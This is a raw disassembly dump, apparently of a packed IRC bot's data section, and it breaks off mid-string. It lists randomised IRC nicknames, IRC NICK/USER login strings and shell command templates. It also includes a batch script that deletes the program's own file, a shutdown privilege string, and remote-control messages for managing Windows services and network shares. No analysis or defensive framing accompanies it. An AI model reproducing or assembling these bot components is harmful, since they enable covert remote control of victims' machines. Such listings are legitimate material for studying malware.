; "hakan3" dd offset aImirzali ; "IMIRZALI--" dd offset aRamtha ; "RAMTHA" dd offset aEmre ; "Emre--" dd offset aElmaazyok ; "elmaazyok" dd offset aEsmerkiz ; "Esmerkiz" dd offset aKebikec ; "kebikec" dd offset aFlord ; "FLoRD" dd offset aHoly ; "holy" dd offset aMahinur ; "MAHINUR" dd offset aSadikaellesme ; "SaDIkaEllesme" dd offset aAykut1 ; "aykut1" dd offset aKashmira ; "Kashmira" dd offset aSeviseli ; "SeViSeLi" dd offset aSugarboy ; "SUGARBOY-" dd offset aUzgun36 ; "uzgun36" dd offset aKumul ; "kumul" dd offset aAdalim ; "ADALIM" dd offset aUmut ; "umut-" dd offset aAnk32M ; "ANK-32-M" dd offset aDjspace ; "DJSPACE" dd offset aAnkar ; "Ankar" dd offset aFenerlee ; "FeNeRLee" dd offset aHayran ; "hayran" dd offset aAngelgirl ; "angelgirl" dd offset aKapk ; "kapk" dd offset aAchilles ; "Achilles" dd offset aTegmen ; "TEGMEN" dd offset aKotan ; "kotan" dd offset aSevda ; "sevda" dd offset off_438A18 dd offset aAlcatras ; "alcatras" dd offset aA44m ; "a44m" dd offset aBirsen ; "birsen" dd offset aYabanc ; "yabanc" dd offset aDevre ; "devre" dd offset aErkan ; "erkan" dd offset aAnkm ; "ankM" dd offset aAdem28 ; "Adem28" dd offset aMaxsilla ; "maxsilla" dd offset aM41ist ; "M41IST" dd offset aAdamm33 ; "AdAMM33" dd offset aFirtina ; "firtina" dd offset aAta29 ; "Ata29" dd offset aKoray ; "KORAY" dd offset aAkden ; "akden" dd offset aIzmirlm ; "izmirlm" dd offset aUla ; "ula" dd offset aNeHaber ; "NE-HABER" dd offset aPassenger ; "passenger" dd offset aTropikal ; "tropikal" dd offset aCool30m ; "cool30m" dd offset aCem39 ; "cem39" dd offset aRerpjj ; "RERPJJ" dd offset aTeoman ; "TEOMAN```" dd offset aDallas43m ; "DALLAS43M" dd offset aPrometheus ; "prometheus" dd offset aMaveRIck ; "MaVe{R}icK" dd offset aAdamm ; "ADAMM" dd offset aCumhur29 ; "cumhur29" dd offset aWantedlove ; "WANTEDLOVE" off_4385E8 dd offset aSex ; DATA XREF: sub_417ADE+41r ; sub_417ADE+ECr ; "sex" dd offset aLez ; "lez" dd offset aZex ; "zex" dd offset aTree ; "tree" dd offset aBad ; "bad" dd offset aLag ; "lag" dd offset aTambe ; "|tambe|" dd offset aWoh ; "|woh|" dd offset aTot ; "-|tot|" dd offset aSuck ; "|suck|" dd offset aLuck ; "|luck|" dd offset aHub ; "{hub}" dd offset aSex_0 ; "{sex}" dd offset aGens ; "{gens|" dd offset aLuvuF ; "||luvu-f|" dd offset aWiked ; "|wiked|" dd offset aSick ; "sick}}" dd offset aQ8 ; "Q8" dd offset aQ8A ; "|q8|a" dd offset dword_438E74 dd offset aC ; "c" dd offset aD ; "d" dd offset aE ; "e" dd offset dword_438E88 dd offset dword_438E84 dd offset dword_438E80 dd offset aI ; "i" dd offset dword_42BBFC dd offset aJ ; "j" dd offset aK ; "k" dd offset asc_42CE54 ; "l" dd offset aM ; "m" dd offset aN ; "n" dd offset aO ; "o" dd offset aP ; "p" dd offset aQ ; "q" dd offset aRs ; "rs" dd offset aT ; "t" dd offset aU ; "u" dd offset aV ; "v" dd offset dword_438E90 dd offset dword_438E78 dd offset dword_438E8C dd offset dword_438E7C dd offset aHappy ; "happy" dd offset aRg ; "rg" dd offset aTy ; "ty" dd offset aGf ; "gf" dd offset aRt ; "rt" dd offset aSdf ; "sdf" dd offset aUi ; "ui" dd offset aLuvy ; "luvy" dd offset aTrimy ; "trimy" dd offset aTruck ; "truck" dd offset aMuckc ; "muckc" dd offset dword_438E7C dd offset dword_438E84 dd offset aS_1 ; "s" dd offset aQ ; "q" dd offset off_438838 dd offset aBbl ; "|bbl" dd offset byte_43D808 dd offset byte_43D808 dd offset a___0 ; "_|_" dd offset byte_43D808 dd offset byte_43D808 dd offset byte_43D808 dd offset byte_43D808 dd offset dword_438E44 dd offset aM_0 ; "M" dd offset aLuvu ; "LUVU" dd offset aSad ; "Sad" dd offset aF_2 ; "^^^f^" dd offset dword_438E74 dd offset byte_43D808 dd offset aSleeping ; "Sleeping" dd offset byte_43D808 dd offset byte_43D808 dd offset aFuck_0 ; "Fuck" dd offset aFree ; "Free" dd offset byte_43D808 dd offset byte_43D808 dd offset dword_438E28 dd offset byte_43D808 dd offset aBoy ; "BOY" dd offset aGirl_0 ; "GIRL" dd offset aGurl ; "gurl" dd offset aShit ; "shit" dd offset aAha ; "aha" dd offset aYeah ; "yeah" dd offset aMuha ; "muha" dd offset aMof0 ; "mof0" dd offset aMofo ; "mofo" dd offset dword_4387B8 dd offset dword_4387B4 dd offset dword_4387AC dd offset dword_4387A0 dd offset dword_438798 dd offset dword_438790 dd offset dword_438788 dd offset dword_438784 dd offset dword_438780 dword_438780 dd 7536h ; DATA XREF: UPX0:0043877Co dword_438784 dd 7535h ; DATA XREF: UPX0:00438778o dword_438788 dd 7C75347Ch, 0 ; DATA XREF: UPX0:00438774o dword_438790 dd 6F79347Bh, 7D75h ; DATA XREF: UPX0:00438770o dword_438798 dd 7375347Ch, 7Ch ; DATA XREF: UPX0:0043876Co dword_4387A0 dd 7865737Ch, 65726634h, 7C65h ; DATA XREF: UPX0:00438768o dword_4387AC dd 6F6C6F6Ch, 7C617Ch ; DATA XREF: UPX0:00438764o dword_4387B4 dd 6C6F6Ch ; DATA XREF: UPX0:00438760o dword_4387B8 dd 746F74h ; DATA XREF: UPX0:0043875Co aMofo db 'mofo',0 ; DATA XREF: UPX0:00438758o align 4 aMof0 db 'mof0',0 ; DATA XREF: UPX0:00438754o align 4 aMuha db 'muha',0 ; DATA XREF: UPX0:00438750o align 4 aYeah db 'yeah',0 ; DATA XREF: UPX0:0043874Co align 4 aAha db 'aha',0 ; DATA XREF: UPX0:00438748o aShit db 'shit',0 ; DATA XREF: UPX0:00438744o align 4 aGurl db 'gurl',0 ; DATA XREF: UPX0:00438740o align 10h aGirl_0 db 'GIRL',0 ; DATA XREF: UPX0:0043873Co align 4 aBoy db 'BOY',0 ; DATA XREF: UPX0:00438738o aFree db 'Free',0 ; DATA XREF: UPX0:00438724o align 4 aFuck_0 db 'Fuck',0 ; DATA XREF: UPX0:00438720o align 4 aSleeping db 'Sleeping',0 ; DATA XREF: UPX0:00438714o align 4 aF_2 db '^^^f^',0 ; DATA XREF: UPX0:00438708o align 10h aSad db 'Sad',0 ; DATA XREF: UPX0:00438704o aLuvu db 'LUVU',0 ; DATA XREF: UPX0:00438700o align 4 a___0 db '_|_',0 ; DATA XREF: UPX0:004386E4o aBbl db '|bbl',0 ; DATA XREF: UPX0:004386D8o align 4 off_438838 dd offset loc_425242 ; DATA XREF: UPX0:004386D4o aMuckc db 'muckc',0 ; DATA XREF: UPX0:004386C0o align 4 aTruck db 'truck',0 ; DATA XREF: UPX0:004386BCo align 4 aTrimy db 'trimy',0 ; DATA XREF: UPX0:004386B8o align 4 aLuvy db 'luvy',0 ; DATA XREF: UPX0:004386B4o align 4 aUi db 'ui',0 ; DATA XREF: UPX0:004386B0o align 10h aSdf db 'sdf',0 ; DATA XREF: UPX0:004386ACo aRt db 'rt',0 ; DATA XREF: UPX0:004386A8o align 4 aGf db 'gf',0 ; DATA XREF: UPX0:004386A4o align 4 aTy db 'ty',0 ; DATA XREF: UPX0:004386A0o align 10h aRg db 'rg',0 ; DATA XREF: UPX0:0043869Co align 4 aHappy db 'happy',0 ; DATA XREF: UPX0:00438698o align 4 aRs db 'rs',0 ; DATA XREF: UPX0:00438678o align 10h aQ8A db '|q8|a',0 ; DATA XREF: UPX0:00438630o align 4 aQ8 db 'Q8',0 ; DATA XREF: UPX0:0043862Co align 4 aSick db 'sick}}',0 ; DATA XREF: UPX0:00438628o align 4 aWiked db '|wiked|',0 ; DATA XREF: UPX0:00438624o aLuvuF db '||luvu-f|',0 ; DATA XREF: UPX0:00438620o align 4 aGens db '{gens|',0 ; DATA XREF: UPX0:0043861Co align 10h aSex_0 db '{sex}',0 ; DATA XREF: UPX0:00438618o align 4 aHub db '{hub}',0 ; DATA XREF: UPX0:00438614o align 10h aLuck db '|luck|',0 ; DATA XREF: UPX0:00438610o align 4 aSuck db '|suck|',0 ; DATA XREF: UPX0:0043860Co align 10h aTot db '-|tot|',0 ; DATA XREF: UPX0:00438608o align 4 aWoh db '|woh|',0 ; DATA XREF: UPX0:00438604o align 10h aTambe db '|tambe|',0 ; DATA XREF: UPX0:00438600o aLag db 'lag',0 ; DATA XREF: UPX0:004385FCo aBad db 'bad',0 ; DATA XREF: UPX0:004385F8o aTree db 'tree',0 ; DATA XREF: UPX0:004385F4o align 4 aZex db 'zex',0 ; DATA XREF: UPX0:004385F0o aLez db 'lez',0 ; DATA XREF: UPX0:004385ECo aWantedlove db 'WANTEDLOVE',0 ; DATA XREF: UPX0:004385E4o align 4 aCumhur29 db 'cumhur29',0 ; DATA XREF: UPX0:004385E0o align 4 aAdamm db 'ADAMM',0 ; DATA XREF: UPX0:004385DCo align 10h aMaveRIck db 'MaVe{R}icK',0 ; DATA XREF: UPX0:004385D8o align 4 aPrometheus db 'prometheus',0 ; DATA XREF: UPX0:004385D4o align 4 aDallas43m db 'DALLAS43M',0 ; DATA XREF: UPX0:004385D0o align 4 aTeoman db 'TEOMAN```',0 ; DATA XREF: UPX0:004385CCo align 10h aRerpjj db 'RERPJJ',0 ; DATA XREF: UPX0:004385C8o align 4 aCem39 db 'cem39',0 ; DATA XREF: UPX0:004385C4o align 10h aCool30m db 'cool30m',0 ; DATA XREF: UPX0:004385C0o aTropikal db 'tropikal',0 ; DATA XREF: UPX0:004385BCo align 4 aPassenger db 'passenger',0 ; DATA XREF: UPX0:004385B8o align 10h aNeHaber db 'NE-HABER',0 ; DATA XREF: UPX0:004385B4o align 4 aUla db 'ula',0 ; DATA XREF: UPX0:004385B0o aIzmirlm db 'izmirlm',0 ; DATA XREF: UPX0:004385ACo aAkden db 'akden',0 ; DATA XREF: UPX0:004385A8o align 10h aKoray db 'KORAY',0 ; DATA XREF: UPX0:004385A4o align 4 aAta29 db 'Ata29',0 ; DATA XREF: UPX0:004385A0o align 10h aFirtina db 'firtina',0 ; DATA XREF: UPX0:0043859Co aAdamm33 db 'AdAMM33',0 ; DATA XREF: UPX0:00438598o aM41ist db 'M41IST',0 ; DATA XREF: UPX0:00438594o align 4 aMaxsilla db 'maxsilla',0 ; DATA XREF: UPX0:00438590o align 4 aAdem28 db 'Adem28',0 ; DATA XREF: UPX0:0043858Co align 4 aAnkm db 'ankM',0 ; DATA XREF: UPX0:00438588o align 4 aErkan db 'erkan',0 ; DATA XREF: UPX0:00438584o align 4 aDevre db 'devre',0 ; DATA XREF: UPX0:00438580o align 4 aYabanc db 'yabanc',0 ; DATA XREF: UPX0:0043857Co align 4 aBirsen db 'birsen',0 ; DATA XREF: UPX0:00438578o align 4 aA44m db 'a44m',0 ; DATA XREF: UPX0:00438574o align 4 aAlcatras db 'alcatras',0 ; DATA XREF: UPX0:00438570o align 4 off_438A18 dd offset byte_4B5245 ; DATA XREF: UPX0:0043856Co aSevda db 'sevda',0 ; DATA XREF: UPX0:00438568o align 4 aKotan db 'kotan',0 ; DATA XREF: UPX0:00438564o align 4 aTegmen db 'TEGMEN',0 ; DATA XREF: UPX0:00438560o align 4 aAchilles db 'Achilles',0 ; DATA XREF: UPX0:0043855Co align 10h aKapk db 'kapk',0 ; DATA XREF: UPX0:00438558o align 4 aAngelgirl db 'angelgirl',0 ; DATA XREF: UPX0:00438554o align 4 aHayran db 'hayran',0 ; DATA XREF: UPX0:00438550o align 4 aFenerlee db 'FeNeRLee',0 ; DATA XREF: UPX0:0043854Co align 4 aAnkar db 'Ankar',0 ; DATA XREF: UPX0:00438548o align 10h aDjspace db 'DJSPACE',0 ; DATA XREF: UPX0:00438544o aAnk32M db 'ANK-32-M',0 ; DATA XREF: UPX0:00438540o align 4 aUmut db 'umut-',0 ; DATA XREF: UPX0:0043853Co align 4 aAdalim db 'ADALIM',0 ; DATA XREF: UPX0:00438538o align 4 aKumul db 'kumul',0 ; DATA XREF: UPX0:00438534o align 4 aUzgun36 db 'uzgun36',0 ; DATA XREF: UPX0:00438530o aSugarboy db 'SUGARBOY-',0 ; DATA XREF: UPX0:0043852Co align 10h aSeviseli db 'SeViSeLi',0 ; DATA XREF: UPX0:00438528o align 4 aKashmira db 'Kashmira',0 ; DATA XREF: UPX0:00438524o align 4 aAykut1 db 'aykut1',0 ; DATA XREF: UPX0:00438520o align 10h aSadikaellesme db 'SaDIkaEllesme',0 ; DATA XREF: UPX0:0043851Co align 10h aMahinur db 'MAHINUR',0 ; DATA XREF: UPX0:00438518o aHoly db 'holy',0 ; DATA XREF: UPX0:00438514o align 10h aFlord db 'FLoRD',0 ; DATA XREF: UPX0:00438510o align 4 aKebikec db 'kebikec',0 ; DATA XREF: UPX0:0043850Co aEsmerkiz db 'Esmerkiz',0 ; DATA XREF: UPX0:00438508o align 4 aElmaazyok db 'elmaazyok',0 ; DATA XREF: UPX0:00438504o align 4 aEmre db 'Emre--',0 ; DATA XREF: UPX0:00438500o align 10h aRamtha db 'RAMTHA',0 ; DATA XREF: UPX0:004384FCo align 4 aImirzali db 'IMIRZALI--',0 ; DATA XREF: UPX0:004384F8o align 4 aHakan3 db 'hakan3',0 ; DATA XREF: UPX0:004384F4o align 4 aMurat34M db 'murat34-m',0 ; DATA XREF: UPX0:004384F0o align 4 aKeyiflisert db 'keyifliSERT',0 ; DATA XREF: UPX0:004384ECo aArda db 'arda',0 ; DATA XREF: UPX0:004384E8o align 4 aDevran db 'devran',0 ; DATA XREF: UPX0:004384E4o align 4 aBerk19m db 'Berk19m',0 ; DATA XREF: UPX0:004384E0o aDenizlim db 'DenizliM',0 ; DATA XREF: UPX0:004384DCo align 4 aCongueror db 'CoNGuERoR',0 ; DATA XREF: UPX0:004384D8o align 4 aAlpay34m db 'alpay34m',0 ; DATA XREF: UPX0:004384D4o align 10h aBogac db 'bogac',0 ; DATA XREF: UPX0:004384D0o align 4 aDonjuanm db 'Donjuanm',0 ; DATA XREF: UPX0:004384CCo align 4 aAnkh db 'ankh',0 ; DATA XREF: UPX0:004384C8o align 4 off_438BAC dd offset byte_457441 ; DATA XREF: UPX0:004384C4o dword_438BB0 dd 414C5941h, 2Dh ; DATA XREF: UPX0:004384C0o aAlbina db 'albina',0 ; DATA XREF: UPX0:004384BCo align 10h aIzmir39m db 'Izmir39m',0 ; DATA XREF: UPX0:004384B8o align 4 aZack db 'ZACK',0 ; DATA XREF: UPX0:004384B4o align 4 aAnk32m db 'ank32m',0 ; DATA XREF: UPX0:004384B0o align 4 aTurkyy db 'turkyy',0 ; DATA XREF: UPX0:004384ACo align 4 aAhmet db 'ahmet',0 ; DATA XREF: UPX0:004384A8o align 4 aPelincik db 'pelincik',0 ; DATA XREF: UPX0:004384A4o align 4 aBlackpearl db 'blackpearl',0 ; DATA XREF: UPX0:004384A0o align 4 aRetg db 'RETG',0 ; DATA XREF: UPX0:0043849Co align 4 aSamyeli21 db 'samyeli21',0 ; DATA XREF: UPX0:00438498o align 4 aPiramit db 'PIRAMIT',0 ; DATA XREF: UPX0:00438494o aAslii db 'aslii',0 ; DATA XREF: UPX0:00438490o align 4 aErnesto db 'ERNESTO',0 ; DATA XREF: UPX0:0043848Co aHaticem db 'haticem',0 ; DATA XREF: UPX0:00438488o aArzu db 'ARZU',0 ; DATA XREF: UPX0:00438484o align 10h aSudenur db 'SUDENUR',0 ; DATA XREF: UPX0:00438480o aSevmekmi db 'sevmekmi',0 ; DATA XREF: UPX0:0043847Co align 4 aVenedik34 db 'venedik34',0 ; DATA XREF: UPX0:00438478o align 10h aTekir db 'tekir',0 ; DATA XREF: UPX0:00438474o align 4 aMERVE db 'M-E-R-V-E',0 ; DATA XREF: UPX0:00438470o align 4 aTrend3 db 'trend3',0 ; DATA XREF: UPX0:0043846Co align 4 aMelekk db 'melekk',0 ; DATA XREF: UPX0:00438468o align 4 aAkin db 'AKIN',0 ; DATA XREF: UPX0:00438464o align 4 aMary_0 db 'MARY',0 ; DATA XREF: UPX0:00438460o align 4 aJericho db 'JERICHO',0 ; DATA XREF: UPX0:0043845Co aTolga34 db 'Tolga34',0 ; DATA XREF: UPX0:00438458o aMisssunday db 'misssunday',0 ; DATA XREF: UPX0:00438454o align 10h aIrmal db 'irmal',0 ; DATA XREF: UPX0:00438450o align 4 aObenibisevse db 'OBeNiBiSeVSe',0 ; DATA XREF: UPX0:0043844Co align 4 aBerk19 db 'berk19',0 ; DATA XREF: UPX0:00438448o align 10h aHexaaa db 'hexaaa',0 ; DATA XREF: UPX0:00438444o align 4 aErkan27 db 'erkan27',0 ; DATA XREF: UPX0:00438440o aKaan38dent db 'kaan38dent',0 ; DATA XREF: UPX0:0043843Co align 4 aCansuuuu db 'cansuuuu',0 ; DATA XREF: UPX0:00438438o align 4 aThr45h3r5 db 'THR45H3R5',0 ; DATA XREF: UPX0:00438434o align 4 aKencing db 'Kencing',0 ; DATA XREF: UPX0:00438430o aReshma db 'reshma',0 ; DATA XREF: UPX0:0043842Co align 4 aCamel db 'CAMEL',0 ; DATA XREF: UPX0:00438428o align 4 aGirl db 'GirL',0 ; DATA XREF: UPX0:00438424o align 4 aImra db 'imra',0 ; DATA XREF: UPX0:00438420o align 4 aCoredump db 'CoreDump',0 ; DATA XREF: UPX0:0043841Co align 4 aPuregold db 'puregold',0 ; DATA XREF: UPX0:00438418o align 4 aKermit db 'kermit',0 ; DATA XREF: UPX0:00438414o align 4 aManee db 'manee',0 ; DATA XREF: UPX0:00438410o align 4 aTroller db 'troller',0 ; DATA XREF: UPX0:0043840Co aLuisa db 'Luisa',0 ; DATA XREF: UPX0:00438408o align 4 aNastysha db 'nastysha',0 ; DATA XREF: UPX0:00438404o align 10h aRimpy db 'rimpy',0 ; DATA XREF: UPX0:00438400o align 4 aJanno db 'janno',0 ; DATA XREF: UPX0:004383FCo align 10h aBunty db 'bunty',0 ; DATA XREF: UPX0:004383F8o align 4 aHeval db 'heval',0 ; DATA XREF: UPX0:004383F4o align 10h aCme db 'cme',0 ; DATA XREF: UPX0:004383F0o aMarcy db 'marcy',0 ; DATA XREF: UPX0:004383ECo align 4 aTalika db 'talika',0 ; DATA XREF: UPX0:004383E8o align 4 aShez db 'Shez',0 ; DATA XREF: UPX0:004383E4o align 4 aKen db 'ken',0 ; DATA XREF: UPX0:004383E0o aFlexster db 'flexster',0 ; DATA XREF: UPX0:004383DCo align 4 aKoko db 'koko',0 ; DATA XREF: UPX0:004383D8o align 4 aMale db 'male',0 ; DATA XREF: UPX0:004383D4o align 4 aSwin db 'swin',0 ; DATA XREF: UPX0:004383D0o align 4 aCar1nna db 'Car1nna',0 ; DATA XREF: UPX0:004383CCo aKrizha db 'KRIZHA',0 ; DATA XREF: UPX0:004383C8o align 4 aEmilya db 'emilya',0 ; DATA XREF: UPX0:004383C4o align 4 aBobmarley db 'BOBMARLEY',0 ; DATA XREF: UPX0:004383C0o align 4 aMaxxguy db 'maxxguy',0 ; DATA XREF: UPX0:004383BCo aFarooq db 'farooq',0 ; DATA XREF: UPX0:004383B8o align 4 aSmartmir db 'SMARTMIR',0 ; DATA XREF: UPX0:004383B4o align 4 aM_0: ; DATA XREF: UPX0:004383B0o ; UPX0:004386FCo unicode 0, <M>,0 word_438E18 dw 4Eh ; DATA XREF: sub_419E7A+38r ; UPX0:004383ACo align 4 dword_438E1C dd 42h ; DATA XREF: UPX0:004383A8o dword_438E20 dd 56h ; DATA XREF: UPX0:004383A4o dword_438E24 dd 43h ; DATA XREF: UPX0:004383A0o dword_438E28 dd 58h ; DATA XREF: UPX0:0043839Co ; UPX0:00438730o dword_438E2C dd 5Ah ; DATA XREF: UPX0:00438398o dword_438E30 dd 4Ch ; DATA XREF: UPX0:00438394o dword_438E34 dd 4Bh ; DATA XREF: UPX0:00438390o dword_438E38 dd 4Ah ; DATA XREF: UPX0:0043838Co dword_438E3C dd 48h ; DATA XREF: UPX0:00438388o dword_438E40 dd 47h ; DATA XREF: UPX0:00438384o dword_438E44 dd 46h ; DATA XREF: UPX0:00438380o ; UPX0:004386F8o dword_438E48 dd 44h ; DATA XREF: UPX0:0043837Co dword_438E4C dd 53h ; DATA XREF: UPX0:00438378o dword_438E50 dd 50h ; DATA XREF: UPX0:00438370o dword_438E54 dd 4Fh ; DATA XREF: UPX0:0043836Co dword_438E58 dd 55h ; DATA XREF: UPX0:00438364o word_438E5C dw 59h ; DATA XREF: sub_41A19E+38r ; UPX0:00438360o align 10h dword_438E60 dd 54h ; DATA XREF: UPX0:0043835Co dword_438E64 dd 52h ; DATA XREF: UPX0:00438358o dword_438E68 dd 45h ; DATA XREF: UPX0:00438354o dword_438E6C dd 57h ; DATA XREF: UPX0:00438350o dword_438E70 dd 51h ; DATA XREF: UPX0:0043834Co dword_438E74 dd 62h ; DATA XREF: UPX0:00438340o ; UPX0:00438634o ... dword_438E78 dd 78h ; DATA XREF: UPX0:00438334o ; UPX0:0043868Co dword_438E7C dd 7Ah ; DATA XREF: UPX0:00438330o ; UPX0:00438694o ... dword_438E80 dd 68h ; DATA XREF: UPX0:00438320o ; UPX0:0043864Co dword_438E84 dd 67h ; DATA XREF: UPX0:0043831Co ; UPX0:00438648o ... dword_438E88 dd 66h ; DATA XREF: UPX0:00438318o ; UPX0:00438644o dword_438E8C dd 79h ; DATA XREF: UPX0:004382FCo ; UPX0:00438690o dword_438E90 dd 77h ; DATA XREF: UPX0:004382ECo ; UPX0:00438688o dword_438E94 dd 4B43494Eh, 0A732520h, 0 ; DATA XREF: sub_4177D0+B1o dword_438EA0 dd 323334h ; DATA XREF: sub_4177D0+79o dword_438EA4 dd 474E4F50h, 0A732520h, 0 ; DATA XREF: sub_4177D0+61o aNickSUserSHotm db 'NICK %s',0Ah ; DATA XREF: sub_4178BB+9Bo db 'USER %s "hotmail.com" "127.0.0.1" :%s',0Ah,0 align 10h a__0 db '-|`_\{[]}',0 ; DATA XREF: sub_417ADE+BCo ; sub_417ADE+175r ... align 4 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0 dd 3000005h, 10h, 18h, 1, 3 dup(0) ; --------------------------------------------------------------------------- mov al, 1 push edx xchg eax, edi retf 0D059h ; --------------------------------------------------------------------------- db 11h dd 0A000D5A8h, 51800DC9h, 0 dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0 aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_41814D+72o align 10h aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_418294+1Co align 10h aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_418338+2o aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_41835A+140o align 4 a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_41835A+85o db ':repeat',0Dh,0Ah db 'del "%%1"',0Dh,0Ah db 'if exist "%%1" goto repeat',0Dh,0Ah db 'del "%s"',0 aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_41835A+48o align 4 unk_43901C db 2Dh ; - ; DATA XREF: sub_4184E2+9Co db 3, 34h, 2 db 6Ch ; l db 6Fh, 67h, 2 db 3 aOperatingSyste db '- operating system is not supported',0 align 4 unk_43904C db 2Dh ; - ; DATA XREF: sub_4184E2+8Fo db 3, 34h, 2 db 6Ch ; l db 6Fh, 67h, 2 db 3 aFailedWithErro db '- failed with error code %d',0 align 4 dword_439074 dd 234032Dh, 2676F6Ch, 25202D03h, 6F6C2073h, 6C632067h ; DATA XREF: sub_4184E2+5Co dd 65726165h, 64h off_439090 dd offset aAdd ; DATA XREF: sub_4186C2+60r ; sub_418A99+51r ... ; "Add" off_439094 dd offset aAdded ; DATA XREF: sub_4186C2+2Dr ; sub_418A99+83r ... ; "Added" dword_439098 dd 0 ; DATA XREF: sub_4186C2+18r dd offset aDelete_0 ; "Delete" dd offset aDeleted ; "Deleted" align 8 dd offset aList_1 ; "List" dd offset aListed ; "Listed" dd 0 dd offset aStart_0 ; "Start" dd offset aStarted ; "Started" align 10h dd offset aStop_0 ; "Stop" dd offset aStopped_0 ; "Stopped" dd 1, 439104h, 4390FCh, 2, 4390F0h, 4390E4h, 3, 746E6F43h dd 65756E69h, 64h, 746E6F43h, 65756E69h, 0 aPaused db 'Paused',0 align 4 aPause_0 db 'Pause',0 align 4 aStopped_0 db 'Stopped',0 ; DATA XREF: UPX0:004390C4o aStop_0 db 'Stop',0 ; DATA XREF: UPX0:004390C0o align 4 aStarted db 'Started',0 ; DATA XREF: UPX0:004390B8o aStart_0 db 'Start',0 ; DATA XREF: UPX0:004390B4o align 4 aListed db 'Listed',0 ; DATA XREF: UPX0:004390ACo align 4 aList_1 db 'List',0 ; DATA XREF: UPX0:004390A8o align 4 aDeleted db 'Deleted',0 ; DATA XREF: UPX0:004390A0o aDelete_0 db 'Delete',0 ; DATA XREF: UPX0:0043909Co align 4 aAdded db 'Added',0 ; DATA XREF: UPX0:off_439094o align 4 aAdd db 'Add',0 ; DATA XREF: UPX0:off_439090o unk_439158 db 2Dh ; - ; DATA XREF: sub_4186C2+67o db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 2 db 3 aSNoServiceSpec db '- %s: no service specified',0 unk_43917C db 2Dh ; - ; DATA XREF: sub_4186C2+51o db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 2 db 3 aErrorWithServi db '- error with service: ',27h,'%s',27h,' - %s',0 align 4 unk_4391A8 db 2Dh ; - ; DATA XREF: sub_4186C2+33o db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 2 db 3 aSServiceS db '- %s service: ',27h,'%s',27h,0 aAnUnknownError db 'An unknown error occurred: <%ld>',0 ; DATA XREF: sub_4187DE+12Co align 4 aTheSystemIsShu db 'The system is shutting down.',0 ; DATA XREF: sub_4187DE:loc_4188F6o align 4 aTheServiceHasN db 'The service has not been started.',0 ; DATA XREF: sub_4187DE:loc_4188EFo align 4 aTheRequested_1 db 'The requested control code cannot be sent to the service because ' ; DATA XREF: sub_4187DE:loc_4188E8o db 'the state of the service.',0 align 4 aTheServiceHa_0 db 'The service has been marked for deletion.',0 ; DATA XREF: sub_4187DE:loc_4188E1o align 4 aTheServiceCoul db 'The service could not be logged on. The account does not have the' ; DATA XREF: sub_4187DE:loc_4188DAo db ' correct access rights.',0 align 10h aTheSpecified_0 db 'The specified service does not exist.',0 ; DATA XREF: sub_4187DE:loc_4188D3o align 4 aTheServiceHasB db 'The service has been disabled.',0 ; DATA XREF: sub_4187DE:loc_4188CCo align 4 aTheServiceDe_0 db 'The service depends on another service that has failed to start.',0 ; DATA XREF: sub_4187DE:loc_4188C5o align 4 aTheServiceDepe db 'The service depends on a service that does not exist or has been ' ; DATA XREF: sub_4187DE:loc_4188BEo db 'marked for deletion.',0 align 4 aTheSpecifiedDa db 'The specified database does not exist.',0 ; DATA XREF: sub_4187DE:loc_4188B7o align 4 aAnInstanceOfTh db 'An instance of the service is already running.',0 ; DATA XREF: sub_4187DE:loc_41888Co align 4 aTheRequested_0 db 'The requested control code is not valid, or it is unacceptable to' ; DATA XREF: sub_4187DE:loc_418885o db ' the service.',0 align 4 aTheProcessForT db 'The process for the service was started, but it did not call Star' ; DATA XREF: sub_4187DE:loc_41887Eo db 'tServiceCtrlDispatcher.',0 align 4 aAThreadCouldNo db 'A thread could not be created for the service.',0 ; DATA XREF: sub_4187DE:loc_418877o align 4 aTheDatabaseIsL db 'The database is locked.',0 ; DATA XREF: sub_4187DE+8Fo aTheServiceCann db 'The service cannot be stopped because other running services are ' ; DATA XREF: sub_4187DE:loc_41884Co db 'dependent on it.',0 align 4 aTheServiceBina db 'The service binary file could not be found.',0 ; DATA XREF: sub_4187DE:loc_418842o aTheHandleDoesN db 'The handle does not have the required access right.',0 ; DATA XREF: sub_4187DE:loc_418838o aTheHandleIsInv db 'The handle is invalid.',0 ; DATA XREF: sub_4187DE:loc_41882Eo align 4 aTheRequestedCo db 'The requested control code is undefined.',0 ; DATA XREF: sub_4187DE:loc_418824o align 4 aTheSpecifiedSe db 'The specified service name is invalid.',0 ; DATA XREF: sub_4187DE+3Co align 10h aSSS db '%s: %s (%s)',0 ; DATA XREF: sub_41895C+EBo aStopped db ' Stopped',0 ; DATA XREF: sub_41895C:loc_418A28o aStarting db ' Starting',0 ; DATA XREF: sub_41895C:loc_418A21o aStoping db ' Stoping',0 ; DATA XREF: sub_41895C:loc_418A1Ao aRunning db ' Running',0 ; DATA XREF: sub_41895C:loc_418A13o aContinuing db ' Continuing',0 ; DATA XREF: sub_41895C:loc_418A0Co aPausing db ' Pausing',0 ; DATA XREF: sub_41895C:loc_418A05o aPaused_0 db ' Paused',0 ; DATA XREF: sub_41895C:loc_4189FEo aUnknown_0 db ' Unknown',0 ; DATA XREF: sub_41895C+9Bo aTheFollowingWi db 'The following Windows services are registered:',0 ; DATA XREF: sub_41895C+25o align 4 unk_4396FC db 2Dh ; - ; DATA XREF: sub_418A99+ACo db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 2 db 3 aSNoShareSpecif db '- %s: no share specified',0 align 10h dword_439720 dd 234032Dh, 274656Eh, 25202D03h, 68732073h, 3A657261h ; DATA XREF: sub_418A99+8Ao dd 73252720h, 27h unk_43973C db 2Dh ; - ; DATA XREF: sub_418A99+58o db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 2 db 3 aSErrorWithShar db '- %s: error with share: ',27h,'%s',27h,' 